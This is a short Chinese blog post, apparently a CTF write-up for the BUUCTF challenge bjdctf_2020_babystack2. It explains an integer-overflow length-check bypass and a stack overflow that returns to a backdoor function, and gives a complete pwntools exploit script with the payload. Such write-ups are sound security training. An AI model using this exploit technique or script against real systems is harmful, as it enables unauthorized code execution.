buu每日一题（2）

发表于 2021-05-08 分类于 buu

bjdctf_2020_babystack2

简单的，首先通过整数溢出绕过检查，然后栈溢出，存在后门函数，直接执行即可

完整exp

from pwn import *

p=process("./bjdctf_2020_babystack2")
p=remote("node3.buuoj.cn",28526)

context.log_level = 'debug'
context.arch = 'amd64'

backdoor = 0x000400726

p.recvuntil("name:")
p.sendline(str(-1))
p.recvuntil("name?")
payload = 'a'*(0x10+0x8)+p64(backdoor)
p.sendline(payload)
p.interactive()

Q：如果阅读本文需要付费，你是否愿意为此支付1元？

本文作者： Shuwen
本文链接： http://yoursite.com/2021/05/08/00-04/
版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！